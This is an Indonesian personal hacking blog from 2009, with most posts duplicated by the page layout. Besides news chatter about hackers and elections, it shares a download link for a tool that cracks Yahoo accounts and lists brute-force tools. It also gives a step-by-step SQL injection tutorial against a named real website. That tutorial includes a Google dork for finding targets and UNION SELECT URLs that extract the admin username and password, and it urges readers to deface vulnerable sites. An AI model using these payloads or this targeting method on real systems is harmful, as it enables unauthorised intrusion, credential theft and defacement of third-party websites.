PINDAH!
5 minggu yang lalu
Sabtu, 18 Juli 2009
Senin, 13 April 2009
pagi pagi bingung mau ngapain,akhhirnya iseng mampir ke rumah mbah guru,google...aku sempet nanya ma google..apa sie sebenarnya hacker itu???eh aku malah di critain beberapa crita yg menurutku lumayan menarik.Cerita ttg beberapa hal yg masih berhubungan sama apa yg aku tanyain tadi."hacker"
Ternyata ga cuman beberapa taun lalu aja,ada hacker iseng yng mask ke KPU.Pemilu kali ini ternyata juga ada lho penyusup lokal yg udah masuk nyerang KPU.Selama 3 hari berturut2 ada 10 serangan ternyata.Dan katanya yg di serang tuh tabulasi or web pehitungan suara pemilu.Katanya sie si pelaku udah ketahuan,cuma gimana kelanjutanya belum ketahuan.nie aku ada kutipan dikit
"Ada puluhan hacker yang menyerang Sabtu kemarin dan langsung terdeteksi. Ini sudah dilaporkan ke pihak Telkom," kata Husni saat ditemui wartawan di Pusat Tabulasi Nasional Pemilu di Hotel Borobudur, Jakarta, Minggu>>>sumber techno oke zone
"Aku berharap ini bukan cracker, hacker saja," ungkap Sri Nuryanti was-was. >> sumber detikNet...ternyata ada juga ya orang awam yang masih mau "membela" hacker.Dia ternyata tau mana hacker dan mana cracker...hihihihihi
ada satu lagi crita dari luar sono...salah satu manusia terkaya sedunia juga udah jadi korban...bill gates cc nya ke crack...menariknya lagi,duit yg dia curi dari bill gates itu buat ngasih oleh oleh buat bil nya sendiri...jadi,dia ga nyolong duitnya bill,tapi dia nolong bill buat membeliin sesuatu.... hayooo tebak bill di beliin apa?????
Gray, yang dituntut atas perbuatannya yang merugikan karena dia berhasil mendapatkan 23,000 kartu kredit dari berbagai perusahaan yang dihack olehnya salah satunya yaitu kartu kreditnya Bill Gates, yang kemudian Gray memesan dan mengirimkan Viagra kepada Bill dengan kartu kreditnya. >>> sumber http://www.dudung.net/teknologi-informasi/seorang-hacker-remaja-membobol-kartu-kredit-bill-gates.html
hehehehe..ada ada aja ya ulah dan kreatifitasnya mereka mereka. Read More..
Ternyata ga cuman beberapa taun lalu aja,ada hacker iseng yng mask ke KPU.Pemilu kali ini ternyata juga ada lho penyusup lokal yg udah masuk nyerang KPU.Selama 3 hari berturut2 ada 10 serangan ternyata.Dan katanya yg di serang tuh tabulasi or web pehitungan suara pemilu.Katanya sie si pelaku udah ketahuan,cuma gimana kelanjutanya belum ketahuan.nie aku ada kutipan dikit
"Ada puluhan hacker yang menyerang Sabtu kemarin dan langsung terdeteksi. Ini sudah dilaporkan ke pihak Telkom," kata Husni saat ditemui wartawan di Pusat Tabulasi Nasional Pemilu di Hotel Borobudur, Jakarta, Minggu>>>sumber techno oke zone
"Aku berharap ini bukan cracker, hacker saja," ungkap Sri Nuryanti was-was. >> sumber detikNet...ternyata ada juga ya orang awam yang masih mau "membela" hacker.Dia ternyata tau mana hacker dan mana cracker...hihihihihi
ada satu lagi crita dari luar sono...salah satu manusia terkaya sedunia juga udah jadi korban...bill gates cc nya ke crack...menariknya lagi,duit yg dia curi dari bill gates itu buat ngasih oleh oleh buat bil nya sendiri...jadi,dia ga nyolong duitnya bill,tapi dia nolong bill buat membeliin sesuatu.... hayooo tebak bill di beliin apa?????
Gray, yang dituntut atas perbuatannya yang merugikan karena dia berhasil mendapatkan 23,000 kartu kredit dari berbagai perusahaan yang dihack olehnya salah satunya yaitu kartu kreditnya Bill Gates, yang kemudian Gray memesan dan mengirimkan Viagra kepada Bill dengan kartu kreditnya. >>> sumber http://www.dudung.net/teknologi-informasi/seorang-hacker-remaja-membobol-kartu-kredit-bill-gates.html
hehehehe..ada ada aja ya ulah dan kreatifitasnya mereka mereka. Read More..
Rabu, 08 April 2009
Hari peNentuan ????
BEsok pagi 9 April 2009,hampir semua penduduk Indonesia yang sudah mendapatkan hak pilihnya [bagi yg ga dapet ya silahkan merasa berbangga hati...]berbondong2 menuju TPS untuk menggunakan hak pilihnya.Hak untuk menentukan masa depan bangsa Indonesia.Untuk kesekian kalinya pemilu diselenggarakan lagi.
Aku dapet hak pilih juga ga ya???hehe...moga moga aja aku ga kedaftar...kalopun aku kedafftar,aku lebih memilih diam..ngegame di kontrakan yang selalu de kill..daripada kudu memilih para pengobral janji buat memimpin Indonesia,daripada kudu salah pilih dan akhirnya menyengsarakan negriku tercinta.Bodo amat dengan fatwa yg beredar bahwa golput itu haram,makruh or wateper piple said lah.
Mending aku yang dosa.Daripada aku salah pilih malah menyengsarakan banyak rakyat,banyak orang,dan memberi kesempatan kepada orang lain buat berbiat seenaknya.Kalo aku yang dosa toh cuman aku yang kena dampaknya,ga bawa2 orang banyak.
Sejak pertama pemilu,nyatanya banyak demo,protes yang ditujukan kepada orang yang telah mereka pilih sendiri.Dari bapak Soeharto ALM,sampai bapak SBY...kita yang piih mereka,kita juga yang "mengutuk" kebijakan mereka.
Salah satu alasan ku buat milih diam,adalah karena mereka udah terbukti berbohong,cuman ngomong manis pas kampanye,abis kampanye...who knows???Yang masih sangat anget pun,mereka lalaikan.Mereka janji mau memasang dan membongkar sendiri atribut kampanye mereka di hari yg udah di tentukan,tapi kenyataanya...sampai kemaren sore pun aku masih liat banyak atribut partai/kampanye yang masih terpampang di tempat umum.Hal sesepele itupun mereka langar,apalagi hal yang lebih gede lagi.
Sudah yakinkah kalian bahwa mereka yang mengajukan diri,emang tulus berniat mempimpin bangsa ini menuju ke arah yang lebih baik lagi,ataupun cuma mencari kekayaan saja !!! Read More..
Aku dapet hak pilih juga ga ya???hehe...moga moga aja aku ga kedaftar...kalopun aku kedafftar,aku lebih memilih diam..ngegame di kontrakan yang selalu de kill..daripada kudu memilih para pengobral janji buat memimpin Indonesia,daripada kudu salah pilih dan akhirnya menyengsarakan negriku tercinta.Bodo amat dengan fatwa yg beredar bahwa golput itu haram,makruh or wateper piple said lah.
Mending aku yang dosa.Daripada aku salah pilih malah menyengsarakan banyak rakyat,banyak orang,dan memberi kesempatan kepada orang lain buat berbiat seenaknya.Kalo aku yang dosa toh cuman aku yang kena dampaknya,ga bawa2 orang banyak.
Sejak pertama pemilu,nyatanya banyak demo,protes yang ditujukan kepada orang yang telah mereka pilih sendiri.Dari bapak Soeharto ALM,sampai bapak SBY...kita yang piih mereka,kita juga yang "mengutuk" kebijakan mereka.
Salah satu alasan ku buat milih diam,adalah karena mereka udah terbukti berbohong,cuman ngomong manis pas kampanye,abis kampanye...who knows???Yang masih sangat anget pun,mereka lalaikan.Mereka janji mau memasang dan membongkar sendiri atribut kampanye mereka di hari yg udah di tentukan,tapi kenyataanya...sampai kemaren sore pun aku masih liat banyak atribut partai/kampanye yang masih terpampang di tempat umum.Hal sesepele itupun mereka langar,apalagi hal yang lebih gede lagi.
Sudah yakinkah kalian bahwa mereka yang mengajukan diri,emang tulus berniat mempimpin bangsa ini menuju ke arah yang lebih baik lagi,ataupun cuma mencari kekayaan saja !!! Read More..
Sabtu, 07 Maret 2009
My special thanks to
Satu setengah tahun yang lalu,asku masih jadi orang yang super gaptek.Ga kenal sama sekali sama komputer,apalagi internet.1,5 tahun lalu,akuk cuman bisa ngetik,main solitaire doang.Padahal waktu itu sudah banyak anak seumurku atau dibawah ku,yang sudah bisa chating,main fs,ngeblog,bahkan yang udah menguasai IT.Tapi aku....NOL GEDE.Aku ga bisa apa2.Bahkan pas pertama nyoba buat bikin id yahoo langsung di bajak passwordnya.
Dan sekarang udah agak mending..Udah bisa chating,dikit ngrubah tampilan fs,ngerti dikit html,css,JS walau masih suka copas,tapi paling ngga dah ngerti alurnya..dah bisa make,and ngerti fungsinya.Sekarang udah bisa nyolong and mengantisipasi kecolongan password email,fs..dan lain lainya[tetep aja yg ngerti sedikit].
Semua itu ga bakal aku dapet,ga bakal aku bisa pelajari kalo ga ada beberapa orang temen cuber ku di berbagai forum dan milis hacking.Mas Bre al underDOS,RamzHC,viperHC,pyzyyroot,coco_nk4l,burhan Al marahmerah,dan masih banyak yang belum aku sebutin..[thanks allot friends]
DIkit cuapcuap sok tau dari aku "jangan pernah malu buat mengakui ketidak tauan kita,jangan pernah malu buat bertanya,jangan pernah menyerah buat terus ngedapetin jawaban dari semua pertanyaan kita,dan jangan takut buat mencba dan melakukan kesalahan atau kegagalan" itu yang aku dapet dari 1,5 taun belakangan ini.
Semua yang aku bikin,semua yang aku bisa ga lepas dari bantan dan kebaikan dari kalian semua.Once more time ...thanks allot all my cyber friends... Read More..
Dan sekarang udah agak mending..Udah bisa chating,dikit ngrubah tampilan fs,ngerti dikit html,css,JS walau masih suka copas,tapi paling ngga dah ngerti alurnya..dah bisa make,and ngerti fungsinya.Sekarang udah bisa nyolong and mengantisipasi kecolongan password email,fs..dan lain lainya[tetep aja yg ngerti sedikit].
Semua itu ga bakal aku dapet,ga bakal aku bisa pelajari kalo ga ada beberapa orang temen cuber ku di berbagai forum dan milis hacking.Mas Bre al underDOS,RamzHC,viperHC,pyzyyroot,coco_nk4l,burhan Al marahmerah,dan masih banyak yang belum aku sebutin..[thanks allot friends]
DIkit cuapcuap sok tau dari aku "jangan pernah malu buat mengakui ketidak tauan kita,jangan pernah malu buat bertanya,jangan pernah menyerah buat terus ngedapetin jawaban dari semua pertanyaan kita,dan jangan takut buat mencba dan melakukan kesalahan atau kegagalan" itu yang aku dapet dari 1,5 taun belakangan ini.
Semua yang aku bikin,semua yang aku bisa ga lepas dari bantan dan kebaikan dari kalian semua.Once more time ...thanks allot all my cyber friends... Read More..
Senin, 02 Februari 2009
Crackerz Mania Crackz0r By Chad
mas bos [cyber_kebumen] buat master cyber_kebumen,nie request ente yg ke 2.crackerz mania punya Chad..bagi yg Belum tau nie soft...hihi mending ga usah tau aja deh...ngko ndak dadi pengen berjahat jahat ria...wekekekekeDengan soft ini km bisa meng crack yahoo orang lain..Bagi yg tertarik n pengen banget nyobanya...silahkan hubungin master cyber_kebumen...kayaknya dia tau banget tool tool keren buat cracking...wekekekekek http://www.mirikspace.com/fail/zeieZ1+2+1+1 tuh link downloadnya...silahkan di rangkain sendiri ya...wekekekkekekekeke
Read More..
Minggu, 01 Februari 2009
brute force alla wong bodo
Coba coba deh...beraniin diri buat urun pendapat,n pamer kebodohan.wekekekekek.@mas cyber_kebumen maaf banget klo jawabanya sangat mengecewakan banget.Udah ngerti kan walitas otak ane ga se hebat ente.Tapi berhubung ente nulis beberapa kata di blog ku,ya saya tanggapin.Tamu masa di cuekin.
Brute force....Mmm pernah denger sie.Pernah baca juga,tapi lama.KLo ga salah brute force itu Teknik yang paling sering digunakan oleh orang untuk mendapatkan password, kode atau kombinasi,dengan cara mencoba semua kombinasi yang Memungkinkan.Contoh,cari user ame sama pass,dengan cara mengkobiasikan nama,tgl lahir,nmr hp,dll.Pokoknya kita coba semua kemungkinan dari a-z.klo soal toolnya aku malagh baru tau brute force ada toolnya.Penasaran gede,nanya aja deh ma sang master "google".Walhasil dikasih tau beberapa tools.Diantaranya
# aircrack
# brutus
# esset
# john the ripper
bingung mode = on
aslinya ga tau apa2 ttg ginian.Aku ada sie brutus ma john tapi ga isa upload...maklum sapidi kebumen uploade elek.Bandwith upload e kurang.Buat mas cyber_kebumen mangap ya nek jawabane blas banget. Read More..
Brute force....Mmm pernah denger sie.Pernah baca juga,tapi lama.KLo ga salah brute force itu Teknik yang paling sering digunakan oleh orang untuk mendapatkan password, kode atau kombinasi,dengan cara mencoba semua kombinasi yang Memungkinkan.Contoh,cari user ame sama pass,dengan cara mengkobiasikan nama,tgl lahir,nmr hp,dll.Pokoknya kita coba semua kemungkinan dari a-z.klo soal toolnya aku malagh baru tau brute force ada toolnya.Penasaran gede,nanya aja deh ma sang master "google".Walhasil dikasih tau beberapa tools.Diantaranya
# aircrack
# brutus
# esset
# john the ripper
bingung mode = on
aslinya ga tau apa2 ttg ginian.Aku ada sie brutus ma john tapi ga isa upload...maklum sapidi kebumen uploade elek.Bandwith upload e kurang.Buat mas cyber_kebumen mangap ya nek jawabane blas banget. Read More..
Selasa, 20 Januari 2009
sql injection ala newbie
Sory kalo post kali ini agak ga jelas,soalnya aku juga masih belajar.Itung itung sambil nginget nginget gimana step stepnya.Kalo suatu saat bie komp di instal ulang kan jadi ga ilang tutor yang jadi panduan belajar ku.Kalau ada yang mau belajar sql injection monggo sinau bareng...wekekekekke
1st cari target web yang mau dijadiin korban
caranya tuliskan dork ini di google
inurl:news.php?id= site:is >> buat nyari web target yg berasal dai israel.
keterangan is di belakang itu berarti israel,bisa digantii dengan negara lain.contoh my=>> malaysia,id =>> indonesia,jpg =>> jepang dll
dalam contoh ini aku pake situs yang sama kaya pas aku diajarin sama temen ku [thx ma plen pizzy]
target adalah http://www.eimearquinn.com/shop.php?id=96
2nd
kita tambahkan tanda ' tepat dibelakang angka id nya
http://www.eimearquinn.com/shop.php?id=96'
kalau muncul pesan eror pada sql nya,itu berarti ada bugs atau celahnya.Dan itu berarti kita bisa masuk kedalam buat ngacak2 tuh web.
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' ORDER BY ItemID DESC' at line 1 tuh contoh pesan erornya.
3th mencari jumlah tabel yg ada di databasenya
di belakang nomor id nya kita tmbahkan+order+by+1/*
http://www.eimearquinn.com/shop.php?id=96+order+by+1
ternyata pakai angka satu pesan erornya hilang.Itu artinya angka yg kita tebak itu salah.Mari kita cari angka lain di atasnya sampai ketemu pesan eror itu dateng lagi.Dalam contoh ini ternyata pesan eror itu kluar di angka 15.BErarti jumlah tabel yg ada cuman 14.Kenapa nmr 14?? saatnya nalar anda yang bicara.wekekekeke
Kalau kita menghitung dari angka terkecil,maka kita mencari sampai kita nemu pesan eror,dan jumlah tabelnya itu adalah angka pas kita nemu pesan eror kurangi 1.
Dan apabila kita nyari dari angka besar,maka kita nyari angka yg ga ada pesan erornya.POkoknya gitulah,wkwkwkwkwk
4th kita cari kolom yg kebuka
caranya kita tambahkan +union+select pada akhir url
http://www.eimearquinn.com/shop.php?id=989%20union%20select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*
disitu aku tulis angka 1-14 karena jumlah tabel yang ada pada databasenya adalah 14.
kita cari ada angka berapa yang keluar di halaman web tersebut,itulah tabel yang show.DIsini angka yg keluar adalah angka 6.
5th cari tau nama database n version nya
gantikan(user(),0x3a,database(),0x3a,version()) pada angka yang show tadi.
http://www.eimearquinn.com/shop.php?id=989 union select
1,2,3,4,5,>concat_ws(user(),0x3a,database(),0x3a,version()) 7,8,9,10,11,12,13,14/*
klo mnrt kus ie bgian ini kaya ga penting...ga tau juga sie...soalnya pas aku coba database ma version ga kepake hwhwhwhwh...
lanjut
6th cari nama tabel
ganti angka yg kluar dengan table_name, dan tambahkan +from+information_schema.tables+where+table_schema=database()+limit+0,1/* abis angka terakhir.
http://www.eimearquinn.com/shop.php?id=989%20union%20select%201,2,
3,4,5,table_name,7,8,9,10,11,12,13,14+from+information_schema.tables+where+table_schema=database()+limit+0,1/*
tulisan yg kluar itu adalah nama tabelnya admin_eq=>>> nama tabelnya.
7th cari column
hampir sama
angka yg show di ganti column_name
dan di belakang angka terakhir kita tambah +from+information_schema.columns+where+table_schema=database()+limit+0,1/*
http://www.eimearquinn.com/shop.php?id=989%20union%20select%201,2,3,4,5,column_name,7,8,9,10,11,12,13,14+from+information_schema.columns+where+table_schema=database()+limit+0,1/*
trus limit+o.1 ganti sama limit+1,1
http://www.eimearquinn.com/shop.php?id=989%20union%20select%201,2,3,4,5,column_name,7,8,9,10,11,12,13,14+from+information_schema.columns+where+table_schema=database()+limit+1,1/*
akan muncul user name
dan kalo di ganti limit+2,1
http://www.eimearquinn.com/shop.php?id=989%20union%20select%201,2,3,4,5,column_name,7,8,9,10,11,12,13,14+from+information_schema.columns+where+table_schema=database()+limit+2,1/*
akan muncul password.
keterangan kalau pas cari column dah kluar banyak tulisan,maka cari yang berbau user name and password.BEda web beda yg kluar,maka beda cara.
8th mencari tau nama user name and password admin
http://www.eimearquinn.com/shop.php?id=989+union+select+1,2,3,4,5,concat(Username,0x3a,Password),7,8,9,10,11,12,13,14%20from%20admin_eq/*
angka 6 diganti sama concat(Username,0x3a,Password) karena pada column nya ada 2 kata itu yang aku curiga sebagai jalan buat nyari pass ma user name
di belakang ada admin_eq karena itulah nama tabel nya
tara....pass ma user name nya dah kluar.Silahkan tebak tebak sendiri dimanakah halaman buat log in admin.di sini halaman log inya ada di http://www.eimearquinn.com/admin/
URUT2an langkahnya
1.cari target pake dork inurl:news.php?id= site:is atau yg lain
2.tambahkan tanda 'pada akhir/belakang angka
http://www.eimearquinn.com/shop.php?id=96'
3.tambahkan tanda
+union+select+tebak angka
http://www.eimearquinn.com/shop.php?id=96+order+by+100/*
4.cari tabel yg show
http://www.eimearquinn.com/shop.php?id=989%20union%20selec
t%201,2,3,4,5,6,7,8,9,10,11,12,13,14/*
5.cari nama user,database,version
http://www.eimearquinn.com/shop.php?id=989 union select
1,2,3,4,5,concat_ws(user(),0x3a,database(),0x3a,version()),7,8,9,10,11,12,13,14/*
6 cari tau nama table
http://www.eimearquinn.com/shop.php?id=989%20union%20select%201,2,3,4,5,table_name,7,8,9,10,11,12,13,14+from+information_schema.tables+where+table_schema=database()+limit+0,1/
7.cari tau nama tabel
http://www.eimearquinn.com/shop.php?id=989%20union%20select%201,2,
3,4,5,column_name,7,8,9,10,11,12,13,14+from+information_schema.columns+w
here+table_schema=database()+limit+0,1/*
8 cari pass ma user name admin
http://www.eimearquinn.com/shop.php?id=989+union+select+1,2,3,4,5,
concat(Username,0x3a,Password),7,8,9,10,11,12,13,14%20from%20admin_e
keterangan perintah
+ =>> tanda buat spasi bisa diganti sama %20
/8 =>> tanda buat pengakhir perintah bisa diganti dengan --
ada banyak cara yang beda dengan cara ini,intinya sama aja urut urutanya,cuma beda cara.lain kali aku post kan cara yg lain yang aku tu,n udah aku coba.
saran : carilah bugs web,dan kalo emu web yg ada celahnya silahkan di deface,karena udah susah susah belajar ini,tapi jangan lupa buat ngingetin tuh admin buat nutup celah yang ada.Jangan jadi orang yang jahat.C U next post.
Read More..
1st cari target web yang mau dijadiin korban
caranya tuliskan dork ini di google
inurl:news.php?id= site:is >> buat nyari web target yg berasal dai israel.
keterangan is di belakang itu berarti israel,bisa digantii dengan negara lain.contoh my=>> malaysia,id =>> indonesia,jpg =>> jepang dll
dalam contoh ini aku pake situs yang sama kaya pas aku diajarin sama temen ku [thx ma plen pizzy]
target adalah http://www.eimearquinn.com/shop.php?id=96
2nd
kita tambahkan tanda ' tepat dibelakang angka id nya
http://www.eimearquinn.com/shop.php?id=96'
kalau muncul pesan eror pada sql nya,itu berarti ada bugs atau celahnya.Dan itu berarti kita bisa masuk kedalam buat ngacak2 tuh web.
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' ORDER BY ItemID DESC' at line 1 tuh contoh pesan erornya.
3th mencari jumlah tabel yg ada di databasenya
di belakang nomor id nya kita tmbahkan+order+by+1/*
http://www.eimearquinn.com/shop.php?id=96+order+by+1
ternyata pakai angka satu pesan erornya hilang.Itu artinya angka yg kita tebak itu salah.Mari kita cari angka lain di atasnya sampai ketemu pesan eror itu dateng lagi.Dalam contoh ini ternyata pesan eror itu kluar di angka 15.BErarti jumlah tabel yg ada cuman 14.Kenapa nmr 14?? saatnya nalar anda yang bicara.wekekekeke
Kalau kita menghitung dari angka terkecil,maka kita mencari sampai kita nemu pesan eror,dan jumlah tabelnya itu adalah angka pas kita nemu pesan eror kurangi 1.
Dan apabila kita nyari dari angka besar,maka kita nyari angka yg ga ada pesan erornya.POkoknya gitulah,wkwkwkwkwk
4th kita cari kolom yg kebuka
caranya kita tambahkan +union+select pada akhir url
http://www.eimearquinn.com/shop.php?id=989%20union%20select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*
disitu aku tulis angka 1-14 karena jumlah tabel yang ada pada databasenya adalah 14.
kita cari ada angka berapa yang keluar di halaman web tersebut,itulah tabel yang show.DIsini angka yg keluar adalah angka 6.
5th cari tau nama database n version nya
gantikan(user(),0x3a,database(),0x3a,version()) pada angka yang show tadi.
http://www.eimearquinn.com/shop.php?id=989 union select
1,2,3,4,5,>concat_ws(user(),0x3a,database(),0x3a,version()) 7,8,9,10,11,12,13,14/*
klo mnrt kus ie bgian ini kaya ga penting...ga tau juga sie...soalnya pas aku coba database ma version ga kepake hwhwhwhwh...
lanjut
6th cari nama tabel
ganti angka yg kluar dengan table_name, dan tambahkan +from+information_schema.tables+where+table_schema=database()+limit+0,1/* abis angka terakhir.
http://www.eimearquinn.com/shop.php?id=989%20union%20select%201,2,
3,4,5,table_name,7,8,9,10,11,12,13,14+from+information_schema.tables+where+table_schema=database()+limit+0,1/*
tulisan yg kluar itu adalah nama tabelnya admin_eq=>>> nama tabelnya.
7th cari column
hampir sama
angka yg show di ganti column_name
dan di belakang angka terakhir kita tambah +from+information_schema.columns+where+table_schema=database()+limit+0,1/*
http://www.eimearquinn.com/shop.php?id=989%20union%20select%201,2,3,4,5,column_name,7,8,9,10,11,12,13,14+from+information_schema.columns+where+table_schema=database()+limit+0,1/*
trus limit+o.1 ganti sama limit+1,1
http://www.eimearquinn.com/shop.php?id=989%20union%20select%201,2,3,4,5,column_name,7,8,9,10,11,12,13,14+from+information_schema.columns+where+table_schema=database()+limit+1,1/*
akan muncul user name
dan kalo di ganti limit+2,1
http://www.eimearquinn.com/shop.php?id=989%20union%20select%201,2,3,4,5,column_name,7,8,9,10,11,12,13,14+from+information_schema.columns+where+table_schema=database()+limit+2,1/*
akan muncul password.
keterangan kalau pas cari column dah kluar banyak tulisan,maka cari yang berbau user name and password.BEda web beda yg kluar,maka beda cara.
8th mencari tau nama user name and password admin
http://www.eimearquinn.com/shop.php?id=989+union+select+1,2,3,4,5,concat(Username,0x3a,Password),7,8,9,10,11,12,13,14%20from%20admin_eq/*
angka 6 diganti sama concat(Username,0x3a,Password) karena pada column nya ada 2 kata itu yang aku curiga sebagai jalan buat nyari pass ma user name
di belakang ada admin_eq karena itulah nama tabel nya
tara....pass ma user name nya dah kluar.Silahkan tebak tebak sendiri dimanakah halaman buat log in admin.di sini halaman log inya ada di http://www.eimearquinn.com/admin/
URUT2an langkahnya
1.cari target pake dork inurl:news.php?id= site:is atau yg lain
2.tambahkan tanda 'pada akhir/belakang angka
3.tambahkan tanda
+union+select+tebak angka
http://www.eimearquinn.com/shop.php?id=96+order+by+100/*
4.cari tabel yg show
t%201,2,3,4,5,6,7,8,9,10,11,12,13,14/*
5.cari nama user,database,version
http://www.eimearquinn.com/shop.php?id=989 union select
1,2,3,4,5,concat_ws(user(),0x3a,database(),0x3a,version()),7,8,9,10,11,12,13,14/*
6 cari tau nama table
http://www.eimearquinn.com/shop.php?id=989%20union%20select%201,2,3,4,5,table_name,7,8,9,10,11,12,13,14+from+information_schema.tables+where+table_schema=database()+limit+0,1/
7.cari tau nama tabel
http://www.eimearquinn.com/shop.php?id=989%20union%20select%201,2,
3,4,5,column_name,7,8,9,10,11,12,13,14+from+information_schema.columns+w
here+table_schema=database()+limit+0,1/*
8 cari pass ma user name admin
http://www.eimearquinn.com/shop.php?id=989+union+select+1,2,3,4,5,
concat(Username,0x3a,Password),7,8,9,10,11,12,13,14%20from%20admin_e
keterangan perintah
+ =>> tanda buat spasi bisa diganti sama %20
/8 =>> tanda buat pengakhir perintah bisa diganti dengan --
ada banyak cara yang beda dengan cara ini,intinya sama aja urut urutanya,cuma beda cara.lain kali aku post kan cara yg lain yang aku tu,n udah aku coba.
saran : carilah bugs web,dan kalo emu web yg ada celahnya silahkan di deface,karena udah susah susah belajar ini,tapi jangan lupa buat ngingetin tuh admin buat nutup celah yang ada.Jangan jadi orang yang jahat.C U next post.
Langgan:
Entri (Atom)
